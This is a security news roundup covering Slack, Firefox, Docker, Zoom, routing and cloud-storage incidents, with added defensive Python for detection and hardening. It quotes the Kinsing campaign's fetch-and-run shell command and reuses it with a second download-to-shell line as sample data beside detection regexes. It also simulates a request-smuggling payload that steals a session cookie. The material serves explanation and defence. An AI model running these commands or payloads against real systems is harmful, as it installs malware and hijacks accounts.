As the coronavirus pandemic continues to worsen, remote-collaboration platforms – now fixtures in many workers’ “new normal” – are facing more scrutiny. Popular video-conferencing app Zoom may currently be in the cybersecurity hot seat, but other collaboration tools, such as Slack, Trello, WebEx and Microsoft Teams, are certainly not immune from cybercriminal attention. For organizations leaning on these platforms, security should be top of mind: a failure to lock down Slack and the like could lead to data breaches, brand damage, malware infestations and more, and researchers say attackers are hard at work looking for new weaknesses to achieve all of those. Fortunately, best practices can go a long way toward shrinking the risk.

Collaboration App Security Bugs: Not Hypothetical

The risk posed by collaboration platforms is far from hypothetical. In March, for example, a critical vulnerability was found in Slack that could allow automated account takeovers (ATOs) and lead to data breaches. According to a HackerOne bug-bounty report, an HTTP request smuggling bug was used in a proof-of-concept to force open redirects within Slack, sending users to a rogue client outfitted with Slack domain cookies. When victims connected to the malicious client, their session cookies could be harvested and later used to take over accounts. The attack could also be automated. “Automated account takeover attacks, like Slack just had to deal with, are pervasive,” said Jason Kent,…
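The mechanism behind the bug class named in that report, as an added illustration that is not the HackerOne proof-of-concept and not Slack's code: a front end that frames request bodies by Content-Length and a back end that honours Transfer-Encoding: chunked disagree about where the attacker's request ends, so the bytes the attacker appends become the start of the next user's request on the shared back-end connection. The hostnames, the /redirect path and the cookie value are constructed for the example.

```python
"""CL.TE request smuggling, simulated with two HTTP/1.1 body parsers.

Added illustration of the bug class, not the Slack report's proof-of-concept.
All hosts, paths and cookie values below are made up."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Request:
    start_line: str
    headers: Dict[str, str]
    body: bytes


def _split_head(buf: bytes) -> Optional[Tuple[str, Dict[str, str], bytes]]:
    head, sep, rest = buf.partition(b"\r\n\r\n")
    if not sep:
        return None                      # header block not complete yet
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest


def parse_cl(buf: bytes) -> Tuple[List[Request], bytes]:
    """Front-end view: frame bodies by Content-Length, ignore Transfer-Encoding."""
    reqs: List[Request] = []
    while True:
        parsed = _split_head(buf)
        if parsed is None:
            return reqs, buf
        start, headers, rest = parsed
        n = int(headers.get("content-length", "0"))
        if len(rest) < n:
            return reqs, buf             # wait for the rest of the body
        reqs.append(Request(start, headers, rest[:n]))
        buf = rest[n:]


def parse_te(buf: bytes) -> Tuple[List[Request], bytes]:
    """Back-end view: Transfer-Encoding: chunked wins over Content-Length (RFC 7230 3.3.3)."""
    reqs: List[Request] = []
    while True:
        parsed = _split_head(buf)
        if parsed is None:
            return reqs, buf
        start, headers, rest = parsed
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line.split(b";")[0], 16)
                if size == 0:
                    # zero-size chunk ends the body; skip the empty trailer section
                    rest = rest[2:] if rest.startswith(b"\r\n") else rest
                    break
                body += rest[:size]
                rest = rest[size + 2:]   # chunk data plus its CRLF
        else:
            n = int(headers.get("content-length", "0"))
            body, rest = rest[:n], rest[n:]
        reqs.append(Request(start, headers, body))
        buf = rest


def is_ambiguous(headers: Dict[str, str]) -> bool:
    """The condition a front end should reject outright: both framing headers present."""
    return "content-length" in headers and "transfer-encoding" in headers


# Constructed traffic: attacker and victim share one keep-alive back-end connection.
# The smuggled prefix has no body framing and ends mid-header, so the victim's own
# request line is swallowed into X-Pad and the victim's Cookie header lands on the
# attacker-chosen request.
SMUGGLED = b"GET /redirect?to=https://attacker.test HTTP/1.1\r\nX-Pad: "
_body = b"0\r\n\r\n" + SMUGGLED
ATTACKER = (b"POST / HTTP/1.1\r\nHost: app.test\r\n"
            + b"Content-Length: " + str(len(_body)).encode() + b"\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n" + _body)
VICTIM = (b"GET /account HTTP/1.1\r\nHost: app.test\r\n"
          + b"Cookie: session=victim-secret\r\n\r\n")


def simulate(stream: bytes = ATTACKER + VICTIM):
    """Return (front-end request lines, back-end request lines, cookie seen on the last back-end request)."""
    front, _ = parse_cl(stream)
    back, _ = parse_te(stream)
    return ([r.start_line for r in front],
            [r.start_line for r in back],
            back[-1].headers.get("cookie"))
```

Running `simulate()` shows the front end logging two benign requests (`POST /` and the victim's `GET /account`) while the back end serves `GET /redirect?to=https://attacker.test` carrying the victim's session cookie, and answers it on the victim's connection. The fix on the front-end side is `is_ambiguous`: refuse any request carrying both Content-Length and Transfer-Encoding, and normalise to a single framing before forwarding.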

Source

Mozilla patched two Firefox browser zero-day vulnerabilities actively being exploited in the wild. The flaws, both use-after-free bugs, have been part of “targeted attacks in the wild,” according to a Mozilla Foundation security advisory posted Friday. Both bugs are rated critical and allow remote attackers to execute arbitrary code or trigger crashes. The fixes ship in Firefox 74.0.1 and in the business-friendly Firefox Extended Support Release 68.6.1; earlier builds on Windows, macOS and Linux remain exposed. Details are scant on how either bug (CVE-2020-6819 and CVE-2020-6820) is being exploited by adversaries.

Tracked as CVE-2020-6819, the first bug is a use-after-free triggered while running the destructor of the browser component nsDocShell. nsDocShell is a client of the nsIHttpChannel API, the browser interface for HTTP channels and their headers. The second vulnerability, tracked as CVE-2020-6820, is also a use-after-free bug actively being exploited in the wild. In this case, the attackers are targeting the Firefox browser component ReadableStream, an interface of the Streams API. The Streams API is “responsible for breaking a resource that you want to receive over a network down into small chunks,” according to Mozilla. The bugs were reported by security researchers Francisco Alonso and Javier Marcos of JMP Security. “There is still lots of work to do and more details to be published (including other browsers). Stay…

Source

The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured Docker daemon API ports left open to the internet. Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months; since the beginning of the year, however, the number of daily attempts has far exceeded what was seen before, he said. “We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday.

Kinsing’s Infection Routine

The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance behind it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts.

Figure: A summary of the attack components. Source: AquaSec.

The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null.” This…
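Two checks a defender can run against the pattern described above, written here as an added example (not AquaSec's tooling): whether the local daemon.json binds the Docker API on plain TCP without TLS client verification, which is the misconfiguration the campaign scans for, and whether any container's start command matches the bootstrap quoted by Singer. The daemon.json strings and the `docker inspect`-style container records are constructed for the example; the stager IP is the one quoted in the article.

```python
"""Detect the exposed-daemon misconfiguration and the Kinsing bootstrap command.

Added example, not AquaSec's code. The daemon.json documents and the container
records below are constructed to resemble real `docker inspect` output."""
import json
import re

# Constructed `docker inspect`-style records, trimmed to the fields used here.
SAMPLE_CONTAINERS = json.dumps([
    {"Id": "c1", "Config": {"Image": "ubuntu", "Cmd": ["/bin/bash", "-c",
        "apt-get update && apt-get install -y wget cron;service cron start; "
        "wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null"]}},
    {"Id": "c2", "Config": {"Image": "nginx:1.17", "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "c3", "Config": {"Image": "alpine", "Cmd": ["/bin/sh", "-c",
        "wget -q -O - http://203.0.113.5/x.sh | sh"]}},
])

# Each indicator is one behaviour taken from the command quoted in the article.
INDICATORS = {
    "download-pipe-to-shell": re.compile(r"\b(?:wget|curl)\b[^|;]*\|\s*(?:sh|bash)\b"),
    "installs-fetch-tooling": re.compile(r"apt-get install[^;&|]*\b(?:wget|curl)\b"),
    "keepalive-tail":         re.compile(r"tail -f /dev/null"),
    "kinsing-stager-host":    re.compile(r"142\.44\.191\.122"),   # IP from the AquaSec write-up
}


def indicators_for(cmd: str):
    """Names of the indicators present in one flattened container command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def find_suspicious_containers(inspect_json: str, min_indicators: int = 2):
    """Map container Id -> matched indicators for containers meeting the threshold.

    Two or more indicators keeps a lone `curl ... | sh` from a legitimate
    installer script out of the alert queue; lower the threshold to hunt."""
    hits = {}
    for c in json.loads(inspect_json):
        cmd = " ".join(c.get("Config", {}).get("Cmd") or [])
        matched = indicators_for(cmd)
        if len(matched) >= min_indicators:
            hits[c["Id"]] = matched
    return hits


def daemon_api_exposed(daemon_json: str) -> bool:
    """True when daemon.json binds the API on tcp:// without tlsverify.

    The keys mirror the dockerd --host and --tlsverify flags; a tcp:// listener
    without client-certificate verification is remote root for anyone who can
    reach the port."""
    cfg = json.loads(daemon_json)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    return bool(tcp_hosts) and not cfg.get("tlsverify", False)


# Constructed daemon.json examples: the weak setting beside the corrected one.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], '
    '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem", '
    '"tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)
```

In practice the container records come from `docker inspect $(docker ps -q)` and the daemon config from /etc/docker/daemon.json; the unix socket listener stays in both configurations, only the TCP listener needs TLS client authentication (or, better, should not exist at all if nothing remote needs the API).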

Source

A group of tech giants – including Akamai, Amazon Web Services, Cloudflare, Facebook, Google, Microsoft and Netflix – are banding together to battle route hijacking, route leaks and IP address-spoofing attacks targeting internet users. They are coming together under a program introduced this week by the Mutually Agreed Norms for Routing Security (MANRS) global initiative. Over the past six years MANRS has built up a membership of 300 network operators, internet exchange points (IXPs) and other companies that provide “crucial fixes to reduce the most common routing threats.” MANRS’ latest program brings in content delivery networks (CDNs), like Akamai and Cloudflare, which are geographically distributed groups of servers that provide quick delivery of internet content worldwide. Also included are cloud providers like Microsoft and AWS, which offer network services, infrastructure or cloud-based applications via the internet or private interconnections. Members of the program are tasked with taking specific steps to improve the resilience and security of the routing infrastructure.

The internet routing process is complex; exchanged traffic, for instance, depends on Border Gateway Protocol (BGP), the protocol that joins different networks together to build a “roadmap” of the internet. BGP, however, has no built-in validation of the routes it carries, which can expose businesses to attacks such as route hijacking, route injection attacks, IP address spoofing and more, which allow…
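The validation BGP itself lacks is supplied by RPKI route origin validation, which is one of the measures MANRS participants deploy. The following is an added example (not MANRS or any operator's code) of the RFC 6811 algorithm: an announcement of prefix P from origin AS A is compared with the Validated ROA Payloads (VRPs) that cover P, and comes out Valid, Invalid or NotFound. The ROAs below are constructed from documentation prefixes (RFC 5737, RFC 3849) and documentation ASNs (RFC 5398); the AS 0 entry follows RFC 7607.

```python
"""Route-origin validation (RFC 6811) over a constructed set of ROAs.

Added illustration, not MANRS' or any vendor's code. Prefixes and ASNs are
the documentation ranges, so nothing here refers to a real network."""
import ipaddress
from dataclasses import dataclass
from enum import Enum
from typing import Iterable, List, Tuple, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


class Rov(Enum):
    VALID = "valid"
    INVALID = "invalid"
    NOT_FOUND = "not-found"


@dataclass(frozen=True)
class Vrp:
    """One Validated ROA Payload: `asn` may originate `prefix` and any
    more-specific of it down to `max_length` bits."""
    prefix: Network
    max_length: int
    asn: int


def vrp(prefix: str, max_length: int, asn: int) -> Vrp:
    return Vrp(ipaddress.ip_network(prefix, strict=True), max_length, asn)


# Constructed VRP set (documentation prefixes and ASNs only).
VRPS: List[Vrp] = [
    vrp("192.0.2.0/24", 24, 64496),
    vrp("198.51.100.0/24", 25, 64497),     # maxLength 25: a /25 deaggregate is still fine
    vrp("2001:db8::/32", 48, 64496),
    vrp("203.0.113.0/24", 24, 0),          # AS 0 ROA: nobody may originate this prefix (RFC 7607)
]


def validate_origin(prefix: str, origin_asn: int, vrps: Iterable[Vrp] = VRPS) -> Rov:
    """RFC 6811 section 2: NotFound if no VRP covers the route; Valid if some covering
    VRP matches the origin AS and the route is no longer than its maxLength; else Invalid."""
    route = ipaddress.ip_network(prefix, strict=True)
    covering = [v for v in vrps
                if v.prefix.version == route.version and route.subnet_of(v.prefix)]
    if not covering:
        return Rov.NOT_FOUND
    for v in covering:
        if v.asn == origin_asn and route.prefixlen <= v.max_length:
            return Rov.VALID
    return Rov.INVALID


def filter_announcements(announcements: Iterable[Tuple[str, int]],
                         vrps: Iterable[Vrp] = VRPS,
                         accept_not_found: bool = True):
    """Common operator policy: drop Invalid, accept Valid, and (because most address
    space still has no ROA) accept NotFound. Returns the accepted routes with their state."""
    vrps = list(vrps)
    accepted = []
    for prefix, asn in announcements:
        state = validate_origin(prefix, asn, vrps)
        if state is Rov.VALID or (state is Rov.NOT_FOUND and accept_not_found):
            accepted.append((prefix, asn, state))
    return accepted
```

The two Invalid cases worth noticing are the classic hijack (right prefix, wrong origin AS) and the more-specific hijack (right origin AS, but a /25 announced under a ROA whose maxLength is 24); a less-specific announcement that is not inside any ROA is NotFound, not Invalid, which is why ROAs for your whole allocation matter.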

Source

Researchers have discovered threat actors once again capitalizing on the COVID-19 pandemic and the current attention on the World Health Organization (WHO), with a new spearphishing email that uses the WHO trademark as a lure to spread the LokiBot trojan. Researchers at FortiGuard Labs first observed the malicious COVID-19-themed scam on March 27; the message claims to be from the WHO and purports to address misinformation related to the pandemic to convince users it is authentic. Instead, it carries an attachment that unleashes the LokiBot infostealer if downloaded and executed, according to a blog post published Thursday by threat analyst Val Saengphaibul. “The body of the email contains multiple points about infection control and other suggestions and recommendations, which is obviously a lure to further compel the recipient to continue reading,” he wrote in the post. “And in a twisted fashion, the messaging pretends to address misinformation related to COVID-19/Coronavirus.” While the message, written in English, has legitimate characteristics, the threat actors behind it likely do not speak English as a first language, given “some obvious grammatical, punctuation and spelling issues,” Saengphaibul pointed out. The message also makes an obvious blunder by saying it is from the “WHO Center for Disease Control,” conflating the Switzerland-based WHO with the U.S. Centers for Disease Control and Prevention (CDC), two entirely separate organizations. Moreover, in the body of the message, the author…

Source

On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days. Overall, eight security bugs were addressed in Chrome browser version 80.0.3987.162 for Windows, Mac and Linux. The most severe of these flaws could allow arbitrary code execution, according to the Center for Internet Security (CIS). “Successful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,” according to CIS in a Wednesday alert. “Depending on the privileges associated with the application, an attacker could view, change, or delete data. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.” As is typical for Chrome updates, Google is initially scant on details of the bugs “until a majority of users are updated with a fix.” It did outline three of the vulnerabilities that were discovered by external researchers, however. These included two high-severity vulnerabilities in the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications. The flaws tied to CVE-2020-6450 and CVE-2020-6451 are both use-after-free flaws. Use…

Source

Zoom has nixed a feature that came under fire for “undisclosed data mining” of users’ names and email addresses, used to match them with their LinkedIn profiles. The feature, LinkedIn Sales Navigator, is a LinkedIn service used for sales prospecting. When users entered a web conference meeting, the tool automatically sent their user names and email addresses to an internal Zoom company system, which then matched this data to their LinkedIn profiles, according to a New York Times investigation. Per The New York Times, the tool also automatically allowed other meeting participants to covertly access this LinkedIn profile data, without Zoom asking for users’ permission or notifying them. That means that if a user was in a Zoom meeting – even under a name other than their real one – other participants could collect information about their real names, locations, employer names and job titles. The tool was removed on Thursday as part of several sweeping changes Zoom made in response to snowballing security and privacy concerns. Zoom founder Eric Yuan said in a Wednesday post responding to the concerns that Zoom will freeze the development of new features and instead focus on security and privacy issues. “Over the next 90 days, we are committed to dedicating the resources needed to better identify, address and fix issues proactively,” said Yuan. “We are also committed to being transparent throughout this process. We want to do what it takes to maintain your trust.” With…

Source

Phishing attacks looking to take advantage of interest and fear around the COVID-19 health crisis are becoming a pandemic themselves – and apparently cybercriminals are looking to conserve resources by leaning on their older stockpiles of weapons to keep the infection wave going. Or Katz, a researcher at Akamai, said in a posting on Thursday that older phishing kits that were previously deployed and then retired are being pressed back into service in order to target those working from home. In fact, Akamai researchers have seen recycled phishing kits from as far back as July being used in coronavirus-based phishing attacks now. Millions of Americans are telecommuting due to self-isolation, mandated quarantine or corporate policies as coronavirus infections continue to spike. Akamai’s team, like many others in the security community, has recently observed phishing attacks that start with SMS messages or emails that direct victims to domains “seemingly related to COVID-19 news, governmental updates, or health-related products and services.” In the latest attacks, which have been seen globally, victims that click the link are directed to one domain and then immediately redirected to yet another. The second domain spoofs big brands like Microsoft, Orange France and eBay, or health resources such as the World Health Organization or local medical experts. “By pretending to be an insurance company, bank, medical expert or other trusted brand, criminals are convincing victims to…

Source

As the Coronavirus pandemic continues to force people to work from home, countless companies are now holding daily meetings using videoconferencing services from Zoom. But without the protection of a password, there's a decent chance your next Zoom meeting could be "Zoom bombed" — attended or disrupted by someone who doesn't belong. And according to data gathered by a new automated Zoom meeting discovery tool dubbed "zWarDial," a crazy number of meetings at major corporations are not being protected by a password.

Figure: zWarDial, an automated tool for finding non-password protected Zoom meetings.

According to its makers, zWarDial can find on average 110 meetings per hour and has a success rate of around 14 percent. Each Zoom conference call is assigned a Meeting ID that consists of 9 to 11 digits. Naturally, hackers have figured out they can simply guess, or automate the guessing of, random IDs within that space of digits. Security experts at Check Point Research did exactly that last summer, and found they were able to predict approximately four percent of randomly generated Meeting IDs. The Check Point researchers said enabling passwords on each meeting was the only thing that prevented them from randomly finding a meeting. Zoom responded by saying it was enabling passwords by default in all future scheduled meetings. Zoom also said it would block repeated attempts to scan for meeting IDs, and that it would no longer automatically indicate whether a meeting ID was valid or invalid….
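The two server-side changes Zoom describes, no longer revealing whether an ID is valid and blocking repeated scans, are the standard defences against enumeration. The following is an added illustration of both, not Zoom's code and no claim about how its service is built: a join endpoint that leaks ID validity through its error messages, beside one that returns one failure message for "no such meeting" and "wrong password" and applies a per-client sliding-window attempt limit. The meeting table and client names are constructed; the `now` parameter exists so the window can be exercised without sleeping.

```python
"""Meeting-ID enumeration: a join endpoint that leaks ID validity beside one that does not.

Added illustration, not Zoom's code. The meeting table and clients are constructed."""
import secrets
import time
from collections import deque
from typing import Deque, Dict, Optional

# Constructed meeting table: Zoom-style 9- to 11-digit IDs, one passworded, one not.
MEETINGS: Dict[str, dict] = {
    "123456789": {"password": "s3cret"},
    "98765432101": {"password": None},
}


def leaky_join(meeting_id: str, password: Optional[str] = None) -> str:
    """Distinct responses per failure cause: a scanner learns which IDs exist
    without ever knowing a password, which is all zWarDial needs."""
    meeting = MEETINGS.get(meeting_id)
    if meeting is None:
        return "invalid meeting id"
    if meeting["password"] and password != meeting["password"]:
        return "wrong password"
    return "joined"


class HardenedJoin:
    """Uniform failure message plus a per-client sliding-window attempt limit."""

    def __init__(self, max_attempts: int = 20, window_s: float = 60.0,
                 meetings: Dict[str, dict] = MEETINGS):
        self.max_attempts = max_attempts
        self.window_s = window_s
        self.meetings = meetings
        self._attempts: Dict[str, Deque[float]] = {}   # client -> attempt timestamps

    def join(self, client: str, meeting_id: str, password: Optional[str] = None,
             now: Optional[float] = None) -> str:
        now = time.monotonic() if now is None else now
        q = self._attempts.setdefault(client, deque())
        while q and now - q[0] >= self.window_s:
            q.popleft()                                  # drop attempts outside the window
        if len(q) >= self.max_attempts:
            return "rate limited"
        q.append(now)                                    # failed or not, every probe counts
        meeting = self.meetings.get(meeting_id)
        expected = (meeting or {}).get("password") or ""
        # One comparison on every path, so unknown IDs are not distinguishable
        # from wrong passwords by the response text or by obvious timing.
        ok = secrets.compare_digest(expected.encode(), (password or "").encode())
        if meeting is None or not ok:
            return "join failed"
        return "joined"
```

The rate limit is what stops a scanner from one source, but note what it does not do: a passwordless meeting such as the second entry above is still joinable by anyone who lands on its ID, which is exactly the finding above and why the password default matters more than the other two changes. In a real deployment the client key would be the authenticated account or source address, and the attempt log would live in shared storage rather than in one process.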

Source

Key Ring, creator of a digital wallet app used by 14 million people across North America, has exposed 44 million IDs, charge cards, loyalty cards, gift cards and membership cards to the open internet, researchers say. The Key Ring app allows users to upload scans and photos of various physical cards into a digital folder on the user’s phone. While Key Ring is primarily designed for storing membership cards for loyalty programs, users also store more sensitive cards in the app. The research team at vpnMentor found 44 million scans exposed in a misconfigured cloud database, including government IDs, retail club membership and loyalty cards, NRA membership cards, gift cards, credit cards with all details exposed (including CVV numbers), medical insurance cards and medical marijuana ID cards, among others. vpnMentor said that it found a total of five misconfigured Amazon Web Services (AWS) S3 cloud databases owned by the company. These could have revealed millions of these uploads to anyone with a web browser, thanks to a lack of password-protection on the buckets, the company said. Every file could also be downloaded and stored offline. Threatpost reached out to Key Ring’s media team multiple times over the last few days for a comment or reaction to the findings, with no response, and will update this post with any additional information should the company eventually respond.

Five Databases of Information

According to the research, launched Thursday…
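What "a lack of password-protection on the buckets" means in S3 terms is a world-readable ACL or a bucket policy granting access to `Principal: "*"`, with no Public Access Block switched on to neutralise either. The check below is an added example of auditing those three documents together; it is not vpnMentor's tooling and makes no claim about how Key Ring's buckets were configured. The ACL, policy and Public Access Block dictionaries are constructed in the shapes returned by boto3's `get_bucket_acl`, `get_bucket_policy` (after `json.loads` of its `Policy` string) and `get_public_access_block` (its inner `PublicAccessBlockConfiguration` dict); the bucket name is made up.

```python
"""Decide whether an S3 bucket is world-readable from its ACL, bucket policy and
Public Access Block settings.

Added example; not vpnMentor's or Key Ring's code. All documents below are
constructed in the shapes boto3 returns; the bucket name is fictional."""
import json
from typing import List, Tuple

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def acl_public_grants(acl: dict) -> List[Tuple[str, str]]:
    """(group, permission) pairs granted to everyone, or to any AWS account at all."""
    grants = []
    for g in acl.get("Grants", []):
        uri = g.get("Grantee", {}).get("URI")
        if uri in PUBLIC_GROUPS:
            grants.append((PUBLIC_GROUPS[uri], g["Permission"]))
    return grants


def _wildcard_principal(principal) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):                      # e.g. {"AWS": "*"} or {"AWS": ["...", "*"]}
        return any("*" in _as_list(v) for v in principal.values())
    return False


def policy_public_statements(policy: dict) -> List[Tuple[str, List[str]]]:
    """Allow statements to Principal * that carry no Condition. Conditioned statements
    (aws:SourceIp, aws:SecureTransport, ...) are left for manual review, an assumption
    of this check rather than a claim that they are safe."""
    found = []
    for s in policy.get("Statement", []):
        if (s.get("Effect") == "Allow" and _wildcard_principal(s.get("Principal"))
                and not s.get("Condition")):
            found.append((s.get("Sid", "<no-sid>"), _as_list(s.get("Action", []))))
    return found


def assess_bucket(name: str, acl: dict, policy: dict, public_access_block: dict = None) -> dict:
    """Combine the three documents into one verdict with human-readable reasons.

    Only IgnorePublicAcls neutralises grants that already exist (BlockPublicAcls just
    stops new ones), and only RestrictPublicBuckets neutralises an existing public policy."""
    pab = public_access_block or {}
    reasons = []
    if not pab.get("IgnorePublicAcls", False):
        for group, perm in acl_public_grants(acl):
            reasons.append(f"ACL grants {perm} to {group}")
    if not pab.get("RestrictPublicBuckets", False):
        for sid, actions in policy_public_statements(policy):
            reasons.append(f"policy {sid} allows {', '.join(actions)} to Principal *")
    return {"bucket": name, "public": bool(reasons), "reasons": reasons}


# Constructed inputs: the exposed configuration beside a locked-down Public Access Block.
SAMPLE_ACL = {
    "Owner": {"ID": "example-owner"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},                          # READ on a bucket = anyone can list it
    ],
}
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::card-scans-example/*"},
    {"Sid": "OwnerOnly", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::card-scans-example"}
  ]}""")
PAB_OFF = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
           "BlockPublicPolicy": False, "RestrictPublicBuckets": False}
PAB_ON = {key: True for key in PAB_OFF}
```

With the constructed inputs `assess_bucket` reports two reasons: the AllUsers READ grant lets a browser list the bucket, and the `PublicRead` statement lets it fetch every object, which together match the "anyone with a web browser" exposure described above. Turning on all four Public Access Block settings (the AWS account-level default for new buckets) makes the same ACL and policy inert, and it is the check to run first across every bucket in an account. Object-level ACLs can also expose individual files even when the bucket ACL is clean; they would need a per-object pass that this example does not make.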

Source